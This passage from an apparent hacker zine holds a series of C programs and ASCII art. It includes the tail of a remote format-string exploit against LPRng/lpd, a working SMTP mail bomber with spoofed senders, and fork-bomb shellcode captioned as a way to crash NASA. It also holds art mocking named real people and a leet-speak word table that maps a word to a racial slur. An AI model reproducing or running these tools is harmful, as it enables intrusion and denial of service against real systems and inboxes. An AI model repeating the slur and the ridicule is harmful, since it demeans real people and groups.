'p': targets[type].position = atoi(optarg); break; case 'w': targets[type].written_bytes = atoi(optarg); break; default: usage(argv[0]); return 1; } } if(type < 0) { printf("You must specify a type!\n"); printf("example: ./SEClpd victim -t 0\n"); return -1; } if ( (he = gethostbyname (hostname)) == NULL) { herror("gethostbyname"); exit(1); } targets[type].shellcode_address = targets[type].eip_address + SHELLCODE_COUNT ; printf("+++ www.netcat.it remote exploit for LPRng/lpd \n\n"); printf("+++ Exploit information\n"); printf("+++ Victim: %s\n", hostname); printf("+++ Type: %d - %s\n", type, targets[type].os_name); printf("+++ Eip address: 0x%x\n", targets[type].eip_address); printf("+++ Shellcode address: 0x%x\n", targets[type].shellcode_address); printf("+++ Position: %d\n", targets[type].position); printf("+++ Alignment: %d\n", targets[type].align); printf("+++ Offset %d\n", offset); printf("\n"); printf("+++ Attacking %s with our format string\n", hostname); if( brute > 0 ) { printf("+++ Brute force man, relax and enjoy the ride ;>\n"); targets[type].eip_address = 0xbffffff0; while(failure) { memset(exploit_buffer, '\0', sizeof(exploit_buffer)); format = create_malicious_string(); strcpy(exploit_buffer, address_buffer); strcat(exploit_buffer, format); strcat(exploit_buffer, "\n"); send_code(exploit_buffer); targets[type].eip_address = 0xbffffff0 - offset; offset+=4; if (offset > OFFSET_LIMIT) { printf("+++ Offset limit hit, ending brute mode ;<\n"); return -1; } } } else format = create_malicious_string(); strcpy(exploit_buffer, address_buffer); strcat(exploit_buffer, format); strcat(exploit_buffer, "\n"); send_code(exploit_buffer); printf("Argh exploit failed$#%! try brute force!\n"); return (-1); } /* This exploit can be download from www.netcat.it */ [END_CUT] rm_netcat.it.c [END_DIR] ripped_k0dez ____________________________________ .-' `-. [16]| M4IL B0MB3R |[16] [16]| by: |[16] [16]| tussler |[16] `-.____________________________________.-' [BEGIN_DIR] disturb [CUT_HERE] mailbomb.c #include <netinet/in.h> #include <sys/socket.h> #include <stdio.h> #include <netdb.h> #include <unistd.h> #include <signal.h> char *mkfake(void) { char *name = (char *) calloc(1, 10); *(name + 0) = 'A' + (lrand48() % ('Z' - 'A')); *(name + 1) = 'a' + (lrand48() % ('z' - 'a')); *(name + 2) = 'A' + (lrand48() % ('Z' - 'A')); *(name + 3) = 'a' + (lrand48() % ('z' - 'a')); *(name + 4) = 'A' + (lrand48() % ('Z' - 'A')); *(name + 5) = 'a' + (lrand48() % ('z' - 'a')); *(name + 6) = 'A' + (lrand48() % ('Z' - 'A')); *(name + 7) = 'a' + (lrand48() % ('z' - 'a')); *(name + 8) = 'A' + (lrand48() % ('Z' - 'A')); *(name + 9) = 'a' + (lrand48() % ('z' - 'a')); *(name + 10) = 0; return name; } #define HOST 23 const char *hosts[] = { "aol.com", "mindspring.com", "reality.sgi.com", "yahoo.com", "hotmail.com", "2600.com", "gay.com", "netzero.net", "playboy.com", "hackphreak.com", "b4b0.org", "velkro.net", "BEEP.com", "in-addr.arpa", "showmethemoney.com", "mtv.com", "bluejeans.com", "ns.co.uk", "the-force.net", "starwars.com", "sports.co.ck", "penthouse.nf", "sun.com" }; const char *msg = "YOU HAVE BEEN OWNZED THANX TEW AoHELL NEW VERSION 5.0\n" " -- You've Got Mail (m0th3rfUqR)\n\a\033[?5h\n"; int main(int argc, char **argv) { FILE *sockfd; struct hostent *he; struct sockaddr_in san; int sock, times = 0; void catcher(int s) { shutdown(sock, 2); close(sock); fclose(sockfd); san.sin_family = AF_INET; san.sin_port = htons(IPPORT_SMTP); san.sin_addr.s_addr = *((unsigned long *) he->h_addr); memset(&san.sin_zero, 0, sizeof(san.sin_zero)); if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("reconnect"); exit(-1); } if (connect(sock, (struct sockaddr *) &san, sizeof(san)) == -1) { perror("reconnect"); exit(-1); } if ((sockfd = fdopen(sock, "w+")) == NULL) { perror("reconnect"); exit(-1); } setvbuf(sockfd, (char *) 0, _IONBF, 0); fprintf(sockfd, "HELO fukr.com\r\n"); signal(s, catcher); } srand48(time(0)); if (argc < 4) { fprintf(stderr, "usage: %s [user] [address] [times]\n", argv[0]); exit(0); } if ((he = gethostbyname(argv[2])) == NULL) { herror(argv[2]); exit(-1); } if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } signal(SIGPIPE, catcher); san.sin_family = AF_INET; san.sin_port = htons(IPPORT_SMTP); san.sin_addr.s_addr = *((unsigned long *) he->h_addr); memset(&san.sin_zero, 0, sizeof(san.sin_zero)); if (connect(sock, (struct sockaddr *) &san, sizeof(san)) == -1) { perror("connect()"); exit(-1); } if ((sockfd = fdopen(sock, "w+")) == NULL) { perror("fdopen()"); exit(-1); } setvbuf(sockfd, (char *) 0, _IONBF, 0); usleep(20000); fprintf(sockfd, "HELO pee.com\r\n"); while (times++ < atoi(argv[3])) { usleep(2000); fprintf(sockfd, "MAIL FROM: %s@%s\r\n", mkfake(), hosts[lrand48() % HOST]); fprintf(sockfd, "MAIL FROM: %s@%s\r\n", mkfake(), hosts[lrand48() % HOST]); usleep(2000); fprintf(sockfd, "RCPT TO: %s\r\n", argv[1]); usleep(2000); fprintf(sockfd, "DATA\r\n"); usleep(2000); fprintf(sockfd, "%s\r\n", msg); usleep(2000); fprintf(sockfd, ".\r\n"); usleep(2000); fprintf(stderr, "%i,", times); } usleep(200000); fprintf(sockfd, "QUIT\r\n"); shutdown(sock, 2); close(sock); fclose(sockfd); puts("done."); return 0; } [END_CUT] mailbomb.c [END_DIR] disturb ____________________________________ .-' `-. [17]| un1x f1le m4g1c |[17] [17]| by: |[17] [17]| tmoL |[17] `-.____________________________________.-' Here I will show you a very nice trick to show at LAN partys. First of all, eldump this. Then type: $ file file_m4g1c filemagic: ELF 32-bit LSB (FUCKYOU LAME ASS MOTHERFUCKERZ) This will amaze your friends at the LAN party. Also, change the message to, you have been trojaned motherfucker! This will clearly scare the living shit out of them. [BEGIN_DIR] file_m4g1c [CUT_HERE] file_m4g1c ^?ELF^A^A^A^AFUCKYOU LAME ASS MOTHERFUCKERZ^A [END_CUT] file_m4g1c [END_DIR] file_m4g1c ____________________________________ .-' `-. [18]| ~el8ch4t |[18] [18]| by: |[18] [18]| movl[~el8]. |[18] `-.____________________________________.-' h3r3 iz ~el8ch4t. im h0p1ng it iz a repl4cem3nt f0r the l4me irc pr0t0c0l. itz ez t0 c0mpile, run, and add k0d3z t0. gr34tz 0ut t0 ~el8. [BEGIN_DIR] el8ch4t [CUT_HERE] el8ch4t.c #include <assert.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int DPORT = 31336; #define ACCEPT_NO_CONNEX 0 #define NOCONNEX4U "n0 c0nn3cti0nz f0r y0u m0th3rfuqr, baqup\r\n" #define NIQS1ZE 15 #define MAXINPUT 512 #define CMDCHAR / typedef struct cHaTbuFF { int fd; char niq[NIQS1ZE]; struct sockaddr_in sin; } chat_t; #define MAXCH4TZ 20 chat_t gchat[MAXCH4TZ]; void come_g1t_y0rz (void) { int x; for (x = 0; x <= MAXCH4TZ; x++) { gchat[x].fd = -1; bzero (&gchat[x].niq, NIQS1ZE); } return; } void gr33t (int key, struct sockaddr_in *sin) { int x; char buff[520]; memset (buff, 0, sizeof (buff)); snprintf (buff, (sizeof (buff) - 1), "*** Everyone welcome [%s] to ~el8chat ***\r\n", gchat[key].niq); for (x = 0; x < MAXCH4TZ; x++) { if (x == key) continue; /* d0nt greet 0urs3lvez? */ if (gchat[x].fd != -1) send (gchat[x].fd, buff, strlen (buff), 0x00); } return; } int g3tn1q (int key) { char c; int len = -1; char hello[512]; char n1qy[] = "Enter your ~el8 nickname> "; send (gchat[key].fd, n1qy, strlen (n1qy), 0x00); while (1) { len += 1; recv (gchat[key].fd, &c, 1, 0x00); if (c == '\r' || c == '\n') break; if (len == NIQS1ZE) break; /* haqrz no */ gchat[key].niq[len] = c; } if (len == 0 || len < 0) { send (gchat[key].fd, "Illegal nick\r\n", 15, 0x00); return -1; } for (len = 0; len < MAXCH4TZ; len++) { if (len == key) continue; if (!strncasecmp (gchat[len].niq, gchat[key].niq, strlen (gchat[key].niq))) { send (gchat[key].fd, "Illegal nick, already in use\r\n", 30, 0x00); return -1; } } for (len = 0; len < NIQS1ZE; len++) if (gchat[key].niq[len] == '=') { send (gchat[key].fd, "Illegal char in nick, gbye\r\n", 28, 0x00); return -1; } memset (hello, 0, sizeof (hello)); snprintf (hello, (sizeof (hello) - 1), "*** HEY %s!!!!!!!!!! ***\r\n", gchat[key].niq); send (gchat[key].fd, hello, strlen (hello), 0x00); return 1; } int g00dbye (int key, struct sockaddr_in *sin) { int x; char gbYEmsg[512]; memset (gbYEmsg, 0, sizeof (gbYEmsg)); snprintf (gbYEmsg, sizeof (gbYEmsg) - 1, "*** [%s] has left the building ***\r\n", gchat[key].niq); for (x = 0; x < MAXCH4TZ; x++) { if (x == key) { write (gchat[key].fd, "*** CYA !!!!!!!!!!!!!!! ***\r\n", 29); continue; } else if (gchat[x].fd != -1) { send (gchat[x].fd, gbYEmsg, strlen (gbYEmsg), 0x00); } } shutdown (gchat[key].fd, 2); close (gchat[key].fd); gchat[key].fd = -1; bzero (&gchat[key].niq, sizeof (gchat[key].niq)); return 1; } int w4ll (int key, char *buff) { char urniq[] = "=", format[MAXINPUT + NIQS1ZE + 1]; int x; for (x = 0; x < MAXCH4TZ; x++) { if (x == key) /* ur s3lf */ { bzero (&format, sizeof (format)); snprintf (format, (sizeof (format) - 1), "<%s> %s\r\n", urniq, buff); send (gchat[key].fd, format, strlen (format), 0x00); continue; } if (gchat[x].fd != -1) { bzero (&format, sizeof (format)); snprintf (format, (sizeof (format) - 1), "<%s> %s\r\n", gchat[key].niq, buff); send (gchat[x].fd, format, strlen (format), 0x00); } } return 1; } /* c0mm4nd */ int do_cmd_msg (int key, struct sockaddr *sin, char *msg) { return 1; } int do_cmd_who (int key, char *buff) { int x; char hold[255]; if (buff == '\0') { send (gchat[key].fd, "BCMD:2\r\n", 8, 0x00); for (x = 0; x < MAXCH4TZ; x++) { if (gchat[x].fd == -1) continue; bzero (&hold, sizeof (hold)); snprintf (hold, sizeof (hold) - 1, "%s@%s\r\n", gchat[x].niq, inet_ntoa (gchat[x].sin.sin_addr)); send (gchat[key].fd, hold, strlen (hold), 0x00); } send (gchat[key].fd, "ECMD:2\r\n", 8, 0x00); } return 1; } int s3rv_U (int key, int fd, struct sockaddr_in *sin) { char buff[MAXINPUT]; int n; if (g3tn1q (key) < 0) { g00dbye (key, sin); } gr33t (key, sin); while (31337) { bzero (&buff, sizeof (buff)); n = recv (gchat[key].fd, buff, (sizeof (buff) - 1), 0x00); if (n > MAXINPUT) { printf ("WTF , N IZ %i and MAXINPUT IZ %i, REINSTALL Y0R OS ITS FUKT!!!!!!\n", n, MAXINPUT); } if (buff[0] == '/') { /* command shit */ if (!strncasecmp (&buff[1], "quit", 4)) { g00dbye (key, sin); return 1; } if (!strncasecmp (&buff[1], "who", 3)) { do_cmd_who (key, '\0'); continue; } if (!strncasecmp (&buff[1], "msg", 3)) { //do_cmd_msg(key, sin, buff); continue; } continue; } else { w4ll (key, buff); } } g00dbye (key, sin); return 1; } int main (int argc, char *argv[]) { int sfd, nfd, sfromlen, key; struct sockaddr_in sin, sfrom; bzero (&sin, sizeof (sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; come_g1t_y0rz (); sfd = socket (AF_INET, SOCK_STREAM, 0); if (sfd < 0) { perror ("socket"); exit (-1); } nfd = -1; while (nfd == -1) { DPORT += 1; sin.sin_port = htons (DPORT); nfd = bind (sfd, (struct sockaddr *) &sin, sizeof (sin)); } nfd = 0; printf ("p0rt t0 c0nn3ct t0 = %i\n", DPORT); if (listen (sfd, MAXCH4TZ) < 0) { perror ("listen"); exit (-1); } sfromlen = sizeof (struct sockaddr_in); while (31337) { if ((nfd = accept (sfd, &sfrom, &sfromlen)) < 0) { perror ("acc3pt"); continue; } printf ("c0nn3cti0n fr0m %s\n", inet_ntoa (sfrom.sin_addr)); if (ACCEPT_NO_CONNEX) { write (nfd, NOCONNEX4U, strlen (NOCONNEX4U)); close (nfd); continue; } for (key = 0; key < MAXCH4TZ; key++) if (gchat[key].fd == -1) break; if (key == MAXCH4TZ) { printf ("p0ssible pr0blem\n"); continue; } else { gchat[key].fd = nfd; gchat[key].sin = sfrom; } switch (fork ()) { case 0: s3rv_U (key, nfd, &sfrom); //exit (31337); break; case -1: /* p0ssible f0rkb0mb att4x, we sh0uld ex1t */ puts ("W3'R3 B3ING ATT4CKT!!!!!!!!!!!!!!!!!!!!!!!!!"); exit (-1); break; default: /* i think i hafto close nfd!?!? */ //close(nfd); break; } } return 31337; } [END_CUT] el8ch4t.c [END_DIR] el8ch4t ____________________________________ .-' `-. [19]| s1lly m4kr0z |[19] [19]| by: |[19] [19]| v4ri0uz du0d |[19] `-.____________________________________.-' y0u k4n p4st3 th3z int0 y0r ph4v0r1t3 irc ch4nn3l. u k4n ev3n p4st3 them 0n bugtr4q, usen1x etc. als0, u k4n ch4ng3 the s4y1ngz t0 wh4t3v3r u lyke, p1ss 0ff u phr1endz, p1ss 0ff ur k0us1n, p1ss 0ff s0m1 u h8! [BEGIN_DIR] misc [CUT_HERE] m4kr0z.mac [-------->^BScRoLLeR^B<-] [------->^BScRoLLeR^B<--] [------>^BScRoLLeR^B<---] [----->^BScRoLLeR^B<----] [---->^BScRoLLeR^B<-----] [--->^BScRoLLeR^B<------] [-->^BScRoLLeR^B<-------] [->^BScRoLLeR^B<--------] [-->^BScRoLLeR^B<-------] [--->^BScRoLLeR^B<------] [---->^BScRoLLeR^B<-----] [----->^BScRoLLeR^B<----] [------>^BScRoLLeR^B<---] [------->^BScRoLLeR^B<--] [-------->^BScRoLLeR^B<-] .-------------. | h0nK! h0nK! | ._____ ______, .----------------. '/ BRONC 0ff --> |_I_I_I_I_I_I_I_I]___ t3w --> .::. | _ sh0rt bUz: ; _ ) sk00l --> ':::'' ='-(_)----------=-(_)-' \\\\ \c .( <= ALEPH1 RUNN1N FR0M \ _/ <= TH3 SPA ___/( /( /--/ \\// __ )/ /\/ \/ -.\ //\\ \\// \\ \/ \\ \\ '-- //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\ I: | O F F I C I A L :I I: | W4R3Z K1D LICENSE :I I: //-'`\ | <-><-><-><-><-><-><-><-><-><-> :I I: ;/ _ _ \; | :I I: ; `* *` | | Name: Bronc Buster :I I: | ^ ; | Email: bronc@attrition.org :I I: \ '-=-' / | URL: www.legions.com :I I: ;.___.; | :I I: ) ( | Home: #!gay :I I: .- `-...-` -. | :I I: /` `\ | :I I: / \ | :I *_____________________|________________________________* ,_ _, (`\`'--""--'`/`) ) `'. .'` ( / .-\ /-. \ | ( 0 \/ 0 ) | << H0W M4NNY L1X T0 TH3 | '-'/\'-' | << C3NT3R 0F 4 T00TS13 \ /\/\ / << R0LL P0P ?!?!? ;--' '--; /`.',_.._..,'.`\ / ; ; \ | ; '-'--'-'-' ; | | ,'--.___.--'-, | | . ._ _. . | \ ; ''--'` ; / \/\.`-._._.-'/\/ `;__ __;' ///)```(\\\ (((/ \))) _ _..._ _ .' ) (` '. | / `\ | \_| q p |\_/ \ Y /--..-="````"-. `.=__.-` `\ o\ \-` | | <- 41M H3R3, BR0NC \ .--""`\ < // | || | ((,,_/ ((,,___/ ,-~-, ,-~~~~-, /\ /\ (\ / ,-, \ ,' ', / ~~ \ \'-' / \ \ / _ # <0 0> \ '--' \ \/ .' '. # = Y =/ \ / \ \ `#-..O.-' Y3T 4N0TH3R >> \ \ \ `\ \\ V1CT1M 0F >> ) /> / \ \\ BRONC >> / /`/ /`__ \ \\__ (____)))_))) \__))) .-. |-| | | <- R0uTEZ R3SP0NS3 4G41NST _.-|=|-. <- 4LL3G4T10NZ FR0M / | | | | <- MS. L3W1NSKY | |\ | / \ /` .:\:/:. .:\:\:/:/:. :.:\:\:/:/:.: :=.' - - '.=: '=(\ 9 9 /)=' ( (_) ) <= J1MMY TH4 W4R3Z TR0LL /`-vvv-'\ / juarez! \ / /|,,,,,|\ \ /_// /^\ \\_\ WW( ( ) )WW __\,,\ /,,/__ (______Y______) _.="""=._ /` \ / `\ / / _} {_ \ \ / ; /o) (o\ ; \ \ | / _ \ | / \_/\| (_) |/\_/ /`\_/=\_/`\ RL0xL3Y S4YZ: /` `"` `\ "G3T Y0R D0G 0R C4T SP4Y3D 0R N3UT3R3D" { } _.._ .'/'._`'. /.' '-.\ ( 0 0 ) \ ^ / '.'---'.' `) (` W3LL, J00 KN0 MY N4M3 IZ S1M0N .--'._.'--. 4ND 1 L1K3 T3W D3W DR4W1NGZ / \ / /| |\ \ / / | | \ \ (\_/ |_____| \_/) .-. __ _| '-----------._____________.-'\ `-.`\,' .======. \ ===== ======= \==. __.' || (___|- = = |----------------| | / ,_ || ___| - - -|________________/ | / / / || (___| = = =|________________)==' | (_/ '======'_-- -/ / (_II== / | .---. ___/ / ::. .--. /\ / |( | .::::. / \\ \( // / .:::::: | '-----' ; :::::::: | | :::::::: | ~eL8 S3YZ: "M4K3 L0V3, N0T W4R!" |::::::::: | /::::::::: | '-----------' (\ \\ )) // .-. // .-. / \-((=-/ \ \ \\ / `( ____))_ )` .-' // '-. / (( \ | ! | [ D0NT G3T T00 3XC1T3D, BR0NC ] \ / \ |___| / _) \ / (_ (((---' '---))) .-""""-. .-""""-. / \ / \ /_ _\ /_ _\ // \ / \\ // \ / \\ |\__\ /__/| |\__\ /__/| \ || / \ || / \ / \ / \ __ / \ __ / '.__.' '.__.' | | | | | | | | T4K3 UZ t0 Y0UR K0UR13R _.---._ _.-{_O___O_} _.---._ }_.'` `'. ,_.-(_O___O_) ( (`-.___.-`) ) )_.'_ _'. '.`"-----"`.' ( (_`---`_) ) r4f43l 1z c00l, bUt rUd3, `'-----'` '._`"""`_.' m1ch43l4ng3l0 1z 4 p4rty d00d `"""`_.---._ _.---,_ ,__.-(_a___a_) _.-(_o___o_) }_.'_ _'. }_.'_ _'. ( ( `.___.` ) ) ( (_`---`_) ) '.`"-'''-"`.' '._`````_.' `'-----'` `"""` [END_CUT] m4kr0z.mac [END_DIR] misc ____________________________________ .-' `-. [20]| qu1k3st f0rkb0mb in the w3st |[20] [20]| by: |[20] [20]| movl |[20] `-.____________________________________.-' us3 th1z t0 cr4sh n4s4. [BEGIN_DIR] disturb [CUT_HERE] frk.c #include <stdio.h> /* * ~el8 shellcode !!!!!!! * */ unsigned char shellcode[] = { 0x31, 0xc9, /* xorl %ecx,%ecx */ 0x41, /* incl %ecx */ 0x41, /* incl %ecx */ 0x31, 0xc0, /* xorl %eax,%eax */ 0xb0, 0x02, /* movb $0x2,%al */ 0xcd, 0x80, /* int $0x80 */ 0xb0, 0x25, /* movb $0x25,%al */ 0x31, 0xdb, /* xorl %ebx,%ebx */ 0x89, 0xd9, /* movl %ebx,%ecx */ 0xb1, 0x11, /* movb $0x11,%cl */ 0xcd, 0x80, /* int $0x80 */ 0xe2, 0xee, /* loop 4 */ 0x55, /* pushl %ebp */ 0x89, 0xe5, /* movl %esp,%ebp */ 0x53, /* pushl %ebx */ 0x31, 0xc0, /* xorl %eax,%eax */ 0x31, 0xc9, /* xorl %ecx,%ecx */ 0x41, /* incl %ecx */ 0x41, /* incl %ecx */ 0xb0, 0xa2, /* movb $0xa2,%al */ 0x89, 0x4d, 0xf0, /* movl %ecx,0xfffffff0(%ebp) */ 0x31, 0xc9, /* xorl %ecx,%ecx */ 0x89, 0x4d, 0xf4, /* movl %ecx,0xfffffff4(%ebp) */ 0x89, 0x4d, 0xf8, /* movl %ecx,0xfffffff8(%ebp) */ 0x89, 0x4d, 0xfc, /* movl %ecx,0xfffffffc(%ebp) */ 0x8d, 0x5d, 0xf0, /* leal 0xfffffff0(%ebp),%ebx */ 0x8d, 0x4d, 0xf8, /* leal 0xfffffff8(%ebp),%ecx */ 0xcd, 0x80, /* int $0x80 */ 0x31, 0xc9, /* xorl %ecx,%ecx */ 0x41, /* incl %ecx */ 0x89, 0xcb, /* movl %ecx,%ebx */ 0x89, 0xc8, /* movl %ecx,%eax */ 0xcd, 0x80, /* int $0x80 */ 0x00 }; unsigned char smallcode[] = /* a _much_ smaller version (no exit().. or exit for that matter :-) */ { 0x31, 0xC0, /* xorl %eax, %eax */ 0xB0, 0x02, /* movb $2,%al */ 0xCD, 0x80, /* int $0x80 */ 0xEB, 0xF8, /* jmp baq_and_touch_yourself */ 0x00 /* add a null byte for flavor */ }; int main(void *a,void **b) { printf("1(%i,%Zi 0x%Zx)\n",strlen(shellcode),sizeof(shellcode),sizeof(shellcode)); printf("2(%i,%Zi 0x%Zx)\n",strlen(smallcode),sizeof(smallcode),sizeof(smallcode)); return (0); } [END_CUT] frk.c [END_DIR] disturb ____________________________________ .-' `-. [21]| w4r3z t4lk3r us1ng AI |[21] [21]| by: |[21] [21]| HubERT |[21] `-.____________________________________.-' This w4r3z t4lk3r is the first that ever uses AI to transform the w4r3z sp33k. enj0y it. [BEGIN_DIR] misc [CUT_HERE] haqAI.c #include <stdio.h> #include <termios.h> char toleet(char ch) { char ich = (ch|32); if (ich == 'a') return (1 == (rand() % 3)) ? '4' : ch; else if (ich == 'b') return (1 == (rand() % 3)) ? (1 == (rand() % 4)) ? '8' : '6' : ch; else if (ich == 'c') return (1 == (rand() % 5)) ? (1 == (rand() % 2)) ? '(' : '<' : ch; else if (ich == 'd') return ch; else if (ich == 'e') return (1 == (rand() % 2)) ? '3' : ch; else if (ich == 'f') return ch; else if (ich == 'g') return (1 == (rand() % 6)) ? '9' : ch; else if (ich == 'h') return ch; else if (ich == 'i') return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '|' : '1' : ch; else if (ich == 'j') return ch; else if (ich == 'k') return ch; else if (ich == 'l') return (1 == (rand() % 7)) ? '|' : ch; else if (ich == 'm') return ch; else if (ich == 'n') return ch; else if (ich == 'o') return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '@' : '0' : ch; else if (ich == 'p') return ch; else if (ich == 'q') return ch; else if (ich == 'r') return ch; else if (ich == 's') return (1 == (rand() % 2)) ? (!(rand() % 2)) ? '5' : '$' : ch; else if (ich == 't') return (!(rand() % 4)) ? '7' : ch; else if (ich == 'u') return ch; else if (ich == 'v') return ch; else if (ich == 'w') return ch; else if (ich == 'x') return ch; else if (ich == 'y') return ch; else if (ich == 'z') return (!(rand() % 10)) ? '2' : ch; else return ch; return -1; } int main() { struct termios fu, ck; char ch; srand(time(0)); tcgetattr(0, &ck); fu = ck; ck.c_lflag &= ~(ECHO | ICANON); tcsetattr(0, TCSANOW, &ck); while ((ch = getchar()) != EOF) { if (ch == 127) { putchar("\b \b"[0]); putchar("\b \b"[1]); putchar("\b \b"[2]); continue; } putchar(toleet(ch)); } tcsetattr(0, TCSANOW, &fu); } [END_CUT] haqAI.c [END_DIR] misc ____________________________________ .-' `-. [22]| me.c |[22] [22]| by: |[22] [22]| tRODo |[22] `-.____________________________________.-' [BEGIN_DIR] misc [CUT_HERE] me.c #include <stdio.h> #include <pwd.h> #include <sys/types.h> int main(int argc, char *(*(argv))) { struct passwd *juser; if ((juser = getpwuid(getuid())) == NULL) { perror("getpwuid()"); exit(-1); } printf("\033[2m\xf0 \033[1m%s \033[0;36m",juser->pw_name); while(*++argv) { printf("%s ",*argv); } puts("\033[m"); } [END_CUT] me.c [END_DIR] misc ____________________________________ .-' `-. [23]| un1x p4ssw0rd ste4l3r det3kt0r |[23] [23]| by: |[23] [23]| securityfocus.com |[23] `-.____________________________________.-' This tool is very useful. It was first written by securityfocus for AOL. We have now ported it to UNIX. It is best to run it from your rc scripts, or on a cron minutely of the entire file system. This will locate any password stealing trojan on your operating system. Yours Truly, Aleph1 [BEGIN_DIR] securityfocus [CUT_HERE] pwsdetector.c #include <stdio.h> #include <sys/stat.h> #include <ctype.h> int is_pws(const char *tmp) { int w = 1; while (*tmp) { switch(w) { case 1: if (*tmp == '@') { w = 2; } break; case 2: if (*tmp == '.') { w = 3; } break; case 3: if (*tmp == ' ') { w = 1; } else w = 4; break; case 4: if (isalpha(*tmp)) { return 1; } else w = 1; break; default: break; } tmp++; } return 0; } int main(int argc, char **argv) { FILE *fp; struct stat st; char buf[255]; char pws = 0; while (1) { argv++; argc--; if (!*argv) { break; } if (stat(*argv, &st) == -1) { perror(*argv); exit(-1); } if (st.st_mode & S_IFDIR) { continue; } if ((fp = fopen(*argv, "r")) == NULL) { perror(*argv); exit(-1); } memset(&buf,0,sizeof(buf)); while (!feof(fp)) { memset(&buf,0,sizeof(buf)); fgets(buf,sizeof(buf),fp); if (is_pws(buf)) { pws = 1; break; } } if (pws == 1) { printf("%s: passwd stealer detected.\n", *argv); } else { printf("%s: file is safe!\n", *argv); } pws = 0; fclose(fp); } return 0; } [END_CUT] pwsdetector.c [END_DIR] securityfocus ____________________________________ .-' `-. [24]| leet_talker.c |[24] [24]| by: |[24] [24]| ~el8 pete |[24] `-.____________________________________.-' [BEGIN_DIR] misc [CUT_HERE] leet_talker.c #include <stdio.h> #include <stdlib.h> #include <string.h> struct letterpeople { char a; char b; }; struct wordz { char *a; char *b; }; struct letterpeople leterz[] = { {'a', '4'}, {'e', '3'}, {'i', '1'}, {'o', '0'}, {'s', '5'}, {'A', '4'}, {'O', '0'}, {0, 0} }; struct wordz w0rdz[] = { {"with", "w/"}, {"without", "w/o"}, {"fuck", "fuq"}, {"fucking", "fuqn"}, {"shit", "shyt"}, {"looser", "nigr"}, {0, 0} }; int leet (char *str, int type) { int x, y, nword = 1, z = 0, j = 0; if (type == 1) { /* lame elite leet talker */ for (x = 0; x < strlen (str); x++) { if (str[x] == ' ') { nword = 1; continue; } if (str[x] == 'u') { if (!z) { if (!nword) { str[x] = 'U'; z += 1; continue; } } else z += 1; } if (z == 5) z = 0; /* leniant */ if ((str[x] == 's' || str[x] == 'S') && (!isalpha (str[x + 1]) || str[x + 1] == '\0')) { if (!j) { if (!nword) { str[x] = 'z'; j += 1; continue; } } else j += 1; } if (j == 2) j = 0; for (y = 0; y < sizeof (leterz); y++) { if (str[x] == leterz[y].a) { if (isdigit (str[x - 1]) || isdigit (str[x + 1])) break; if (nword) break; if (str[x + 1] == ' ') break; if (!isalpha (str[x - 1]) || !isalpha (str[x + 1])) break; if (x == strlen (str) - 2) break; if (isupper (str[x - 1]) && islower (str[x + 1])) break; if (str[x] == 'e' || str[x] == 'E') { if (str[x + 1] == 'e' || str[x + 1] == 'E') { str[x + 1] = '4'; x += 1; break; } } str[x] = leterz[y].b; } } nword = 0; } printf ("%s", str); } return 1; } int warez_talker (char *str, int type) { int x, y = 0, z; if (type == 1) { /* lame elite warez talker */ for (x = 0; x < strlen (str); x++) { if (y == 0) { /* make upper */ str[x] = toupper (str[x]); y += 1; } else { /* make lower */ str[x] = tolower (str[x]); y = 0; } } printf ("%s", str); } return 1; } int main (int argc, char *argv[]) { char buff[255]; while (31337) { bzero (&buff, sizeof (buff)); if (fgets (buff, (sizeof (buff) - 1), stdin) == NULL) break; leet (buff, 1); /* leet */ leet (buff, 2); /* more leet */ warez_talker (buff, 1); /* leet */ } return 0x7a69; } [END_CUT] leet_talker.c [END_DIR] misc ____________________________________ .-' `-. [25]| 8ball |[25] [25]| by: |[25] [25]| FUNNY_BUNNY |[25] `-.____________________________________.-' [BEGIN_DIR] 8ball [CUT_HERE] Makefile # Makefile for Magic 8-ball CC=gcc CFLAGS= #CFLAGS=-O2 -Wall -pedantic -ansi #CFLAGS=-DDEBUG #LINKME=-lnsl -lsocket LINKME=-lncurses OBJS=main.o magic.o client.o server.o TARGET=eball all: eball eball: $(OBJS) $(CC) $(CFLAGS) -o $(TARGET) $(OBJS) $(LINKME) .c.o: $(CC) $(CFLAGS) -c $< install: all install -s -m 7755 $(TARGET) /usr/local/bin clean: rm -f core *.o clear: rm -f *.{c,h}~ Makefile~ [END_CUT] Makefile [CUT_HERE] client.c #include "eball.h" #ifdef __linux__ #include <linux/kd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/ioctl.h> #endif #include <curses.h> int doleds(void); int print_magic(const char *MAGIC); extern int ball_client(char *host, short port, int magic_bean) { int sockfd; socklen_t addrlen; struct sockaddr_in me,you; struct hostent *he; char beener[MAX_MAGIC]; char data[MAX_MAGIC]; if ((he=gethostbyname(host))==NULL) { herror(host); exit(-1); } if ((sockfd=socket(AF_INET,SOCK_DGRAM,0))< 0) { perror("udp socket call"); exit(-1); } bzero((char*)&me, sizeof(me)); me.sin_family = AF_INET; me.sin_addr.s_addr = htonl(INADDR_ANY); if ((bind(sockfd,(struct sockaddr*)&me,sizeof(me))<0)) { perror("binding udp socket"); exit(-1); } bzero((char*)&data,sizeof(data)); bzero((char*)&you,sizeof(you)); // sometimes sizeof(you) will return NULL, // this is normal :P you.sin_family = AF_INET; you.sin_addr = *((struct in_addr*)he->h_addr); you.sin_port = htons(port); doleds(); addrlen=(socklen_t)sizeof(you); snprintf(beener,sizeof(beener),"%i",magic_bean); if ((sendto(sockfd,beener,sizeof(beener),0, (struct sockaddr*)&you,(socklen_t)sizeof(you)))<0) { perror("sending magic bean"); exit(-1); } if ((recvfrom(sockfd,data,sizeof(data)-1,0, (struct sockaddr*)&you,&addrlen))<0) { perror("recv'ing magic message"); exit(-1); } print_magic(data); shutdown(sockfd,2); } void sigoose(int s){endwin();exit(1);} int print_magic(const char *MAGIC) { WINDOW *ball; signal(SIGINT,sigoose); initscr(); ball = subwin(stdscr,5,60,10,10); noecho(); intrflush(ball,TRUE); 